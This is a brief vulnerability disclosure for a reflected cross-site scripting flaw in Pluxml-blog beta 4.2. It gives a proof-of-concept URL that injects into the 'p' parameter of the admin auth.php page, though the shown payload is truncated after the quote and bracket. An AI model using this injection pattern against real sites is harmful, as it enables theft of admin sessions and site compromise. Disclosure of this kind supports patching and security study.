###########################################
#
# Script Name : Pluxml-blog
#
# Version :  Pluxml-blog bêta 4.2
#
# Bug Type : XSS vulnerability
#
# Found by : Metropolis
#
# Discovered : 17 December 2009
#
# Download app : http://telechargements.pluxml.org/pluxml-blog-beta4-2.zip
#
#
###########################################
 
PoC :
 
http://[target]/[path]/core/admin/auth.php?p=1[Xss]
 
example :
 
http://[target]/[path]/core/admin/auth.php?p=1">
 
local Example :
 
http://localhost/pluxml/core/admin/auth.php?p=1">
 
[ Greetz:
 
[~]: Frf2 Az£L Z£L EsSandRe ticlem007 the killers themic Lariane All www.metropolis.thebigbang.fr :[~]